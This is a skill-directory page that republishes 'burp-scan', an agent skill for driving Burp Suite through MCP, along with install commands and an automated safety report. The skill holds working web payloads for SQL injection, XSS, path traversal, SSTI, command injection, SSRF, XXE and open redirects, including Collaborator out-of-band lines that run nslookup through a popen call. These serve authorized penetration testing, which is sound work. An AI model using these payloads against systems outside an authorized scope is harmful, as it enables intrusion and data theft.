Burp MCP Vuln Check
langbyyi/CyberStrikeAI-SRC
Automate low-impact web vulnerability verification through Burp MCP.
Burp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs.
The automated check flagged lines worth reading first. See the safety section below.
$ npx skills add six2dez/burp-ai-agent --skill burp-scan -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install six2dez/burp-ai-agent burp-scan --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/six2dez/burp-ai-agent.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/burp-scan .claude/skills/burp-scan && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "burp-scan" agent skill from https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scan into .claude/skills/burp-scan/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "burp-scan", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scanType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add six2dez/burp-ai-agent --skill burp-scan -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install six2dez/burp-ai-agent burp-scan --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/six2dez/burp-ai-agent.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/burp-scan .agents/skills/burp-scan && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "burp-scan" agent skill from https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scan into .agents/skills/burp-scan/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "burp-scan", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add six2dez/burp-ai-agent --skill burp-scan -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install six2dez/burp-ai-agent burp-scan --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/six2dez/burp-ai-agent.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/burp-scan .cursor/skills/burp-scan && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "burp-scan" agent skill from https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scan into .cursor/skills/burp-scan/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "burp-scan", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/six2dez/burp-ai-agent.git --path skills/burp-scan--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add six2dez/burp-ai-agent --skill burp-scan -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install six2dez/burp-ai-agent burp-scan --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/six2dez/burp-ai-agent.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/burp-scan .gemini/skills/burp-scan && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "burp-scan" agent skill from https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scan into .gemini/skills/burp-scan/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "burp-scan", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install six2dez/burp-ai-agent burp-scanInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add six2dez/burp-ai-agent --skill burp-scan -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/six2dez/burp-ai-agent.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/burp-scan .github/skills/burp-scan && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "burp-scan" agent skill from https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scan into .github/skills/burp-scan/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "burp-scan", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add six2dez/burp-ai-agent --skill burp-scan -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install six2dez/burp-ai-agent burp-scan --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/six2dez/burp-ai-agent.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/burp-scan .opencode/skills/burp-scan && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "burp-scan" agent skill from https://github.com/six2dez/burp-ai-agent/tree/main/skills/burp-scan into .opencode/skills/burp-scan/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "burp-scan", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
burp-scanBurp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs.
Burp Scan is an agent skill from six2dez/burp-ai-agent. Burp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs. Use when the user has Burp Suite running with the AI Agent MCP server and wants to scan, test, or analyze web traffic through an AI coding assistant (Claude Code, Gemini CLI, Codex, etc.).
Its SKILL.md is about 6.4k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Penetration testing and MCP servers. It works with Burp Suite, Model Context Protocol and Kotlin. The repository describes itself as: Burp Suite extension that adds built-in MCP tooling, AI-assisted analysis, privacy controls, passive and active scanning and more. The licence is MIT.
6 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit f9dceef. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
No scripts in the folder and no shell commands in SKILL.md (its code samples are xml and json).
From the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
evil-burp-ai.comxyz.burpcollaborator.netlegitimate.com.evil-burp-ai.comFrom URLs in SKILL.md, links to its own repository left out.
Names these keys or tokens, usually read from environment variables:
WEAK_SESSION_TOKENFrom names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Burp Scan loads about 6.4k tokens when it runs. Until then it costs about 99 tokens; SKILL.md has 1,970 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found patterns that need a careful read before installing.
rate -> get unique subdomain (e.g., xyz.burpcollaborator.net)- SSRF: http://xyz.burpcollaborator.net- XXE: <!ENTITY xxe SYSTEM "http://xyz.burpcollaborator.net">- CMDI: ; nslookup xyz.burpcollaborator.net_.__globals__['os'].popen('nslookup xyz.burpcollaborator.net')}}Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from six2dez/burp-ai-agent at commit f9dceef, republished under its MIT licence (© six2dez). 1,970 words, ~6,366 tokens.
.claude/skills/burp-scan/SKILL.md (or your agent's skills folder).Tactical scanning engine for Burp Suite via MCP. Operates Burp's tools programmatically to discover, confirm, and report vulnerabilities.
Prerequisites: Burp Suite running with the AI Agent extension loaded and MCP server enabled.
Tools organized by scanning action. Tools marked [unsafe] require Unsafe Mode enabled. Tools marked [pro] require Burp Professional.
| Tool | Purpose |
|---|---|
scope_check | Check if a URL is in scope |
site_map | Browse Burp's site map |
site_map_regex | Search site map by regex |
proxy_http_history | List proxy HTTP history items |
proxy_http_history_regex | Search proxy history by regex |
proxy_ws_history | List WebSocket history |
proxy_ws_history_regex | Search WebSocket history by regex |
response_body_search | Regex search across all response bodies |
| Tool | Purpose |
|---|---|
params_extract | Extract parameters from a request |
find_reflected | Find reflected parameter values in a response |
insertion_points | List insertion point offsets for a request |
request_parse | Parse raw HTTP request into structured fields |
response_parse | Parse raw HTTP response into structured fields |
diff_requests | Line diff between two requests |
| Tool | Purpose |
|---|---|
http1_request [unsafe] | Send HTTP/1.1 request through Burp and get response |
http2_request [unsafe] | Send HTTP/2 request through Burp and get response |
repeater_tab [unsafe] | Create a Repeater tab with a request |
repeater_tab_with_payload [unsafe] | Create Repeater tab with placeholder replacement |
intruder [unsafe] | Send request to Intruder |
intruder_prepare [unsafe] | Create Intruder tab with explicit insertion points |
| Tool | Purpose |
|---|---|
collaborator_generate | Generate a Burp Collaborator payload (unique subdomain) |
collaborator_poll | Poll for Collaborator interactions (DNS/HTTP callbacks) |
| Tool | Purpose |
|---|---|
url_encode / url_decode | URL encoding/decoding |
base64_encode / base64_decode | Base64 encoding/decoding |
hash_compute | Hash text (MD5/SHA1/SHA256/SHA512) |
jwt_decode | Decode JWT header + payload (no signature verification) |
decode_as | Decompress content (gzip/deflate/brotli) |
cookie_jar_get | Read Burp's cookie jar |
random_string | Generate random strings |
| Tool | Purpose |
|---|---|
issue_create | Create a custom audit issue in Burp's issue list |
scanner_issues [pro] | View existing scanner issues |
| Tool | Purpose |
|---|---|
scan_audit_start [pro][unsafe] | Start a Burp Scanner audit |
scan_crawl_start [pro][unsafe] | Start a Burp Scanner crawl |
scan_task_status [pro] | Get status of a scan task |
Analyze proxy traffic WITHOUT sending additional requests. This is the first phase of any scan.
Use proxy_http_history or proxy_http_history_regex to retrieve in-scope traffic.
Filter: exclude static assets (.css, .js, .png, .jpg, .gif, .svg, .ico, .woff, .woff2, .ttf, .eot, .map).
Focus on: HTML, JSON, XML, text responses.Run these deterministic checks on every request/response pair BEFORE any deeper analysis:
Request Smuggling Indicators:
Content-Length and Transfer-Encoding: chunked presentContent-Length headers with different valuesCSRF Absence:
Deserialization Surface:
rO0AB or aced0005java-serialized or octet-stream with serialized markersUnrestricted File Upload:
For each request/response pair, extract:
For each request/response pair, check for:
Injection: XSS, SQLi, CMDI, SSTI, SSRF, XXE, NoSQL injection, GraphQL injection Auth/Access Control: IDOR/BOLA, BAC (horizontal/vertical), CSRF, JWT weaknesses Information Disclosure: Secrets in responses, debug endpoints, source code exposure Configuration: CORS misconfiguration, open redirect, missing security headers High-Value: Account takeover paths, cache poisoning, request smuggling, host header injection API: Version bypass, GraphQL introspection enabled
| Severity | Examples |
|---|---|
| Critical | RCE, authentication bypass, full account takeover |
| High | SQLi, stored XSS, SSRF with internal access, deserialization, command injection |
| Medium | Reflected XSS, IDOR/BOLA, CSRF on sensitive actions, open redirect, LFI |
| Low | Information disclosure, verbose errors, minor misconfigurations |
When you encounter JavaScript files in proxy history, extract API endpoints using these patterns:
fetch("url"), axios.METHOD("url"), $.ajax({url:"..."}), XMLHttpRequest.open("METHOD","url")
"/api/...", "/v1/...", "/v2/...", endpoint="/...", "/segment/segment/..."Exclude: /css/, /js/, /img/, /static/, /assets/, /fonts/, /media/, /.well-known/
Exclude extensions: .js, .css, .map, .png, .jpg, .svg, .ico, .woff, .pdf, .zip
Test discovered endpoints for access control issues (unauthenticated access, missing authorization).
Use payloads via http1_request to confirm passive findings. Always test against in-scope targets only.
Error-based (Detection: look for DB-specific error strings):
'
"
'--
';--
1'
\Evidence patterns (95% confidence):
You have an error in your SQL syntaxERROR: syntax error at or nearUnclosed quotation mark after the character stringORA-\d{4}:SQLITE_ERROR or near "...": syntax errorBlind Boolean (Detection: compare response differences):
1' AND '1'='1 (should return same as original)
1' AND '1'='2 (should return different/empty)
1 AND 1=1 (numeric context - same)
1 AND 1=2 (numeric context - different)Protocol: Send BOTH true and false conditions. If true matches original and false differs -> confirmed.
Time-based (Detection: measure response delay >= 5 seconds):
1' AND SLEEP(5)-- (MySQL)
1'; WAITFOR DELAY '0:0:5'-- (MSSQL)
1' AND pg_sleep(5)-- (PostgreSQL)UNION-based [MODERATE risk]:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--Unique marker: XSS-BURP-AI-1337 (check for this exact string in response)
<script>alert('XSS-BURP-AI-1337')</script>
<img src=x onerror=alert('XSS-BURP-AI-1337')>
<svg onload=alert('XSS-BURP-AI-1337')>
'"><script>alert('XSS-BURP-AI-1337')</script>
<body onload=alert('XSS-BURP-AI-1337')>
javascript:alert('XSS-BURP-AI-1337')
<ScRiPt>alert('XSS-BURP-AI-1337')</sCrIpT>
</script><script>alert('XSS-BURP-AI-1337')</script>Confidence: 95% if marker reflected with intact tags. 75% if alert(1) reflected (needs manual check).
../../../etc/passwd (Linux - look for root:x:0:0)
....//....//....//etc/passwd (filter bypass)
..%2f..%2f..%2fetc/passwd (URL encoded)
..%252f..%252f..%252fetc/passwd (double encoded)
/etc/passwd (absolute path)
file:///etc/passwd (file protocol)
..\..\..\\windows\\win.ini (Windows - look for [fonts])
../../../etc/passwd%00 (null byte)
....//....//....//etc/passwd%00.jpg (extension bypass)Evidence: root:x:0:0:root:/root: (95%) or [fonts] header (90%)
Unique math markers to avoid false positives:
{{1337*73}} -> look for 97601 in response
{{31337*3}} -> look for 94011 in response
{{7*'7'}} -> look for 7777777 (Jinja2 specific)
${1337*73} -> look for 97601 (Java EL, Spring)
<%= 1337*73 %> -> look for 97601 (ERB/Ruby)
#{1337*73} -> look for 97601 (Thymeleaf)
*{1337*73} -> look for 97601 (Thymeleaf)
{{config}} -> config dump (Jinja2)
{{request}} -> request object leak (Jinja2)
{{''.__class__}} -> Python class access [MODERATE]Evidence: Math result 97601, 94011, or 7777777 in response (95% confidence).
; id -> look for uid=XXX(username) gid=XXX
| id -> same
|| id -> same
& id -> same
&& id -> same
`id` -> same (backticks)
$(id) -> same (command substitution)
| whoami -> look for username output
; sleep 5 -> 5s delay (blind)
| sleep 5 -> 5s delay (blind)Evidence: uid=\d+\(\w+\) gid=\d+\(\w+\) in response (95% confidence).
http://127.0.0.1
http://localhost
http://[::1]
http://127.0.0.1:22 (SSH banner)
http://127.0.0.1:3306 (MySQL)
http://169.254.169.254/latest/meta-data/ (AWS metadata) [MODERATE]
http://metadata.google.internal/computeMetadata/v1/ (GCP metadata) [MODERATE]
file:///etc/passwd
dict://127.0.0.1:11211/stats (Memcached)
gopher://127.0.0.1:6379/_INFO (Redis)<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>No static payloads. Generate based on original value:
Numeric IDs: Test ID-1, ID+1, 1 (first/admin), 0 (edge case), -1 (negative)
UUIDs: Modify last character (0->1 or vice versa)
Protocol: Compare response for original ID vs manipulated ID. If you get valid data for a different user's ID -> IDOR confirmed.
Test marker: evil-burp-ai-test.com
Host: evil-burp-ai-test.com -> check if reflected in response body or Location header
Host: localhost -> check if reflected
Host: 127.0.0.1 -> check if reflectedTest markers: evil-burp-ai.com
redirect_uri=https://evil-burp-ai.com/callback (arbitrary redirect)
redirect_uri=https://legitimate.com.evil-burp-ai.com (subdomain bypass)
redirect_uri=https://legitimate.com@evil-burp-ai.com (@ bypass)
redirect_uri=https://legitimate.com%40evil-burp-ai.com (encoded @ bypass)//evil.com
https://evil.com
/\evil.com
////evil.com
https:evil.comEvidence: evil.com in Location response header.
Test marker: evil-burp-ai-cache.com
X-Forwarded-Host: evil-burp-ai-cache.com -> check if reflected in cached response bodyTest via Origin header:
Origin: https://evil.com -> check ACAO header reflects evil.com (95%)
Origin: null -> check ACAO: null (90%)Append to base URL:
/.git/HEAD -> look for "ref: refs/heads/"
/.git/config -> look for "[core]"
/.git/index -> look for "DIRC" magic bytes
/.svn/entries -> look for "dir"Append to base URL:
/actuator /actuator/env /actuator/health
/_profiler /telescope /__debug__
/phpinfo.php /elmah.axd /debug /trace-1 (negative value)
0 (zero)
0.001 (near-zero)
999999999 (overflow)
-999999999 (large negative)When you know the target's tech stack (from Server/X-Powered-By headers or error patterns), generate technology-specific payloads. For example:
php://filter/...)${...})Safety rule: NEVER generate destructive payloads containing: DROP, DELETE, TRUNCATE, ALTER, GRANT, REVOKE, SHUTDOWN, rm -, FORMAT, DESTROY.
1. scope_check on target URL
2. site_map to understand application structure
3. proxy_http_history to review captured traffic
4. Identify tech stack from response headers (Server, X-Powered-By)
5. Identify auth mechanism (cookies vs tokens vs API keys)1. For each in-scope request/response:
a. Run local pattern checks (Section 2, Step 2)
b. Extract context (Section 2, Step 3)
c. Analyze against checklist (Section 2, Step 4)
d. Flag potential vulns with evidence
2. JS endpoint discovery:
a. Find JS files via proxy_http_history_regex with pattern "\.js$"
b. Extract API endpoints from JS content
c. Test discovered endpoints for auth issuesFor each passive finding, confirm with active testing:
1. Select payloads from Section 3 based on vuln class
2. Send original request via http1_request (baseline)
3. Send modified request with payload via http1_request
4. Analyze response:
ERROR_BASED: Search for error pattern strings in response body
REFLECTION: Search for unique marker (XSS-BURP-AI-1337, etc.) in response
CONTENT_BASED: Search for expected file content (root:x:0:0, [fonts], 97601)
BLIND_BOOLEAN: Send true+false conditions, compare response body/length
BLIND_TIME: Measure response time, confirm >= 5000ms delay
OUT_OF_BAND: Use collaborator_generate, inject payload, then collaborator_poll
5. Confidence thresholds:
- >= 95%: CERTAIN (report immediately)
- >= 85%: FIRM (report with evidence)
- >= 70%: TENTATIVE (investigate further before reporting)
- < 70%: DO NOT REPORT1. collaborator_generate -> get unique subdomain (e.g., xyz.burpcollaborator.net)
2. Inject Collaborator payload in test:
- SSRF: http://xyz.burpcollaborator.net
- XXE: <!ENTITY xxe SYSTEM "http://xyz.burpcollaborator.net">
- CMDI: ; nslookup xyz.burpcollaborator.net
- SSTI: {{config.__class__.__init__.__globals__['os'].popen('nslookup xyz.burpcollaborator.net')}}
3. Wait 5-10 seconds
4. collaborator_poll -> check for DNS/HTTP interactions
5. If interactions found -> vulnerability confirmedTrack per-host information across the scan to improve payload selection:
Tech Stack: Server header, X-Powered-By, X-ASPNet-Version, X-Generator
Auth Info: Session cookies (session, auth, token, sid, jwt, remember)
Bearer tokens (Authorization header)
API keys (X-API-Key, X-Auth-Token)
Error Patterns: Database errors, stack traces, framework exceptions
Prior Findings: What vuln classes were already found on which endpointsUse tech stack knowledge to prioritize:
{{...}}, SQLi with PostgreSQL syntaxphp://filter, deserialize with O: prefix${...}, deserialize with rO0ABWhen a vulnerability is confirmed (confidence >= 85%), create a Burp audit issue:
{
"name": "[Vuln Type] - [Specific Detail]",
"detail": "Full description with evidence...",
"baseUrl": "https://target.com/path",
"severity": "HIGH|MEDIUM|LOW|INFORMATION",
"confidence": "CERTAIN|FIRM|TENTATIVE",
"remediation": "Mitigation advice...",
"httpRequest": "GET /path HTTP/1.1\r\nHost: target.com\r\n...",
"httpResponseContent": "HTTP/1.1 200 OK\r\n...",
"targetHostname": "target.com",
"targetPort": 443,
"usesHttps": true
}| Severity | Vulnerability Classes |
|---|---|
| HIGH | SQLi, CMDI, SSTI, XXE, RFI, Deserialization, Request Smuggling, Account Takeover, MFA Bypass, OAuth Misconfiguration, Git Exposure, Subdomain Takeover, Host Header Injection, Cache Poisoning, LDAP Injection, NoSQL Injection, XPath Injection |
| MEDIUM | XSS (Reflected/Stored/DOM), LFI, SSRF, IDOR/BOLA, Path Traversal, BAC (Horizontal/Vertical), BFLA, Mass Assignment, Auth Bypass, Session Fixation, GraphQL Injection, Stack Trace Exposure, Sourcemap Disclosure, Backup Disclosure, Debug Exposure, S3 Misconfiguration, Cache Deception, Price Manipulation, Race Condition TOCTOU, File Upload, Access Control Bypass, Email Header Injection, API Version Bypass |
| LOW | Open Redirect, Header/CRLF Injection, JWT Weakness, Race Condition, Business Logic, CORS Misconfiguration, Directory Listing, Debug Endpoint, Version Disclosure, Missing Security Headers, Verbose Error, Insecure Cookie, Sensitive Data in URL, Weak Crypto, Log Injection, CSRF, Rate Limit Bypass, Weak Session Token |
| Confidence | Criteria |
|---|---|
| CERTAIN | >= 95% confidence, clear evidence (error string, file content, math result) |
| FIRM | >= 85% confidence, strong evidence (response difference, reflection with context) |
| TENTATIVE | >= 70% confidence, circumstantial evidence (needs manual verification) |
| Vuln Class | Remediation |
|---|---|
| SQLi | Use parameterized queries or prepared statements. Never concatenate user input into SQL queries. |
| XSS | Encode all user input before rendering in HTML. Use Content-Security-Policy headers. |
| LFI/Path Traversal | Validate and sanitize file paths. Use allowlists for permitted files. |
| SSTI | Use logic-less templates or sandbox template execution. Never pass user input directly to template engines. |
| CMDI | Avoid system commands with user input. Use strict allowlists and proper escaping. |
| SSRF | Validate and allowlist destination URLs. Block requests to internal networks and cloud metadata endpoints. |
| IDOR/BOLA | Implement proper authorization checks. Don't rely on obscurity of IDs. |
| XXE | Disable external entity processing in XML parsers. Use JSON instead of XML where possible. |
| CORS | Use explicit allowlist for origins. Never reflect arbitrary origins. Avoid wildcard with credentials. |
| Open Redirect | Validate redirect URLs against an allowlist. Use relative URLs where possible. |
| JWT | Use strong algorithms (RS256). Validate all JWT claims. Don't accept 'none' algorithm. |
| CSRF | Implement anti-CSRF tokens. Use SameSite cookies and verify Origin/Referer on state-changing requests. |
| Host Header Injection | Validate Host header against allowlist. Don't use Host header in password reset URLs or cache keys. |
| Cache Poisoning | Don't use unkeyed headers in cached responses. Validate all header inputs. |
| OAuth | Strictly validate redirect_uri against exact match allowlist. Use state parameter with unpredictable values. |
| File Upload | Restrict file types, validate content, store outside web root, enforce random names. |
| Request Smuggling | Normalize or reject conflicting Content-Length/Transfer-Encoding headers. Use a single HTTP parser. |
| Deserialization | Avoid deserializing untrusted data. Use allowlists for permitted classes. |
A01 - Broken Access Control: IDOR, BOLA, BFLA, BAC_HORIZONTAL, BAC_VERTICAL, MASS_ASSIGNMENT, SSRF, CORS_MISCONFIGURATION, DIRECTORY_LISTING
A02 - Security Misconfiguration: DEBUG_ENDPOINT, STACK_TRACE_EXPOSURE, VERSION_DISCLOSURE, MISSING_SECURITY_HEADERS, VERBOSE_ERROR
A04 - Cryptographic Failures: INSECURE_COOKIE, SENSITIVE_DATA_URL, WEAK_CRYPTO
A05 - Injection: SQLI, XSS_REFLECTED, XSS_STORED, XSS_DOM, CMDI, SSTI, XXE, LDAP_INJECTION, XPATH_INJECTION, NOSQL_INJECTION, GRAPHQL_INJECTION, LOG_INJECTION, LFI, RFI, PATH_TRAVERSAL, HOST_HEADER_INJECTION, EMAIL_HEADER_INJECTION
A06 - Insecure Design: BUSINESS_LOGIC, RATE_LIMIT_BYPASS, PRICE_MANIPULATION, RACE_CONDITION_TOCTOU
A07 - Authentication Failures: JWT_WEAKNESS, AUTH_BYPASS, SESSION_FIXATION, WEAK_SESSION_TOKEN, ACCOUNT_TAKEOVER, OAUTH_MISCONFIGURATION, MFA_BYPASS
A08 - Integrity Failures: DESERIALIZATION, REQUEST_SMUGGLING, CSRF, UNRESTRICTED_FILE_UPLOAD
Cache Attacks: CACHE_POISONING, CACHE_DECEPTION
Information Disclosure: SOURCEMAP_DISCLOSURE, GIT_EXPOSURE, BACKUP_DISCLOSURE, DEBUG_EXPOSURE
Cloud/Infrastructure: S3_MISCONFIGURATION, SUBDOMAIN_TAKEOVER
API Security: API_VERSION_BYPASS
Access Control: ACCESS_CONTROL_BYPASS
Other: OPEN_REDIRECT, HEADER_INJECTION, CRLF_INJECTION, RACE_CONDITION
| Mode | Classes Included |
|---|---|
| BUG_BOUNTY | High-impact only: SQLi, XSS, SSRF, CMDI, SSTI, XXE, IDOR, BOLA, BAC, BFLA, Auth Bypass, OAuth, MFA Bypass, ATO, Host Header Injection, Cache Poisoning/Deception, Open Redirect, Price Manipulation, Race Condition TOCTOU, Access Control Bypass |
| PENTEST | All active-testable classes (excludes passive-only) |
| FULL | All 62 vulnerability classes |
These are detected through traffic analysis only, not payload injection: CORS_MISCONFIGURATION, MISSING_SECURITY_HEADERS, VERSION_DISCLOSURE, INSECURE_COOKIE, REQUEST_SMUGGLING, CSRF, UNRESTRICTED_FILE_UPLOAD, DESERIALIZATION, SUBDOMAIN_TAKEOVER, S3_MISCONFIGURATION, SOURCEMAP_DISCLOSURE, GIT_EXPOSURE, BACKUP_DISCLOSURE, DEBUG_EXPOSURE
Findings have higher impact when they affect:
/login, /signin, /auth, /password, /reset, /oauth, /sso, /2fa): +30%/checkout, /payment, /cart, /order, /purchase, /billing): +40%/admin, /dashboard, /manage, /control, /settings, /internal): +30%/api/, /v1/, /v2/, /graphql, JSON response): +10%Do NOT report if these are present:
SQL Injection false positives:
<code> or <pre> blockXSS false positives:
LFI false positives:
SSTI false positives:
{{1337*73}} in response)NEVER use or generate payloads containing these patterns:
DROP, DELETE, TRUNCATE, ALTER, GRANT, REVOKE, SHUTDOWN
EXEC xp_, rm -, FORMAT, DESTROYAll scanning MUST target in-scope assets only. Always verify scope with scope_check before active testing.
© six2dez, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/burp-scan of six2dez/burp-ai-agent.
Open the folder on GitHubat commit f9dceef
Burp Scan next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Burp Scan this skillsix2dez/burp-ai-agent | 1.5k | — | ~6.4k | Automated safety check: Warn | MIT | |
| Burp MCP Vuln Checklangbyyi/CyberStrikeAI-SRC | 135 | — | ~3.1k | Automated safety check: Pass | Apache-2.0 | |
| Hunt BurpEncod3d-Sec/TORCH | 329 | — | ~3.1k | Automated safety check: Pass | MIT | |
| MCP Server Toolssamugit83/redamon | 3k | — | ~1.8k | Automated safety check: Pass | MIT | |
| Agentic Tool Integrationsamugit83/redamon | 3k | — | ~1.3k | Automated safety check: Pass | MIT | |
| Priority Board Triagesamugit83/redamon | 3k | — | ~1.7k | Automated safety check: Pass | MIT |
langbyyi/CyberStrikeAI-SRC
Automate low-impact web vulnerability verification through Burp MCP.
Encod3d-Sec/TORCH
Drive Burp Suite over its MCP server as an AI triage + attack layer - review proxy history for signals, replay via Repeater/send, OOB-gate blind bugs with Collaborator, fuzz via Intruder (RoE-safe)…
samugit83/redamon
Adding, removing or changing a tool on RedAmon's INBOUND MCP server, where external agents connect in with a personal access token.
samugit83/redamon
Wiring a new tool the AI agent can call (not the recon pipeline): the tool registry, the phase map, the hardcoded dispatch chokepoint, and the duplicated execution paths that make a tool work in…
samugit83/redamon
The Priority Board's three-layer score model (rules BASE, REVIEW by the built-in AI or an MCP agent, a person's DECISION) and who may write which layer.
Encod3d-Sec/TORCH
Capture a Burp Suite Repeater request/response as a PoC image (targets/<eng/poc/) by driving the Burp MCP + the Kali GUI.
Works with
Categories
Burp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs. Burp Scan is an agent skill from six2dez/burp-ai-agent. Burp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs.
Burp Scan fits situations like: the user has Burp Suite running with the AI Agent MCP server and wants to scan; analyze web traffic through an AI coding assistant (Claude Code.
Run `npx skills add six2dez/burp-ai-agent --skill burp-scan -a claude-code`. Or copy the skill folder (skills/burp-scan in six2dez/burp-ai-agent) into .claude/skills/burp-scan in your project. Claude Code loads it when a task matches its description.
Run `npx skills add six2dez/burp-ai-agent --skill burp-scan -a codex`. Or copy the skill folder (skills/burp-scan in six2dez/burp-ai-agent) into .agents/skills/burp-scan in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add six2dez/burp-ai-agent --skill burp-scan -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/burp-scan, .gemini/skills/burp-scan, .github/skills/burp-scan and .opencode/skills/burp-scan in your project.
Going by SKILL.md and its folder, Burp Scan needs credentials named WEAK_SESSION_TOKEN. Our summary lists: Python 3.
SKILL.md names 3 domains. In commands or code: evil-burp-ai.com, xyz.burpcollaborator.net and legitimate.com.evil-burp-ai.com; the agent is likely to contact these when it follows the instructions. This is read from the text; nothing was executed.
Our automated static check of SKILL.md flagged 5 warning(s): mentions a paste, webhook or tunnelling service often used to send data out. Read the flagged lines before installing; the check is not a guarantee either way.
Burp Scan is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
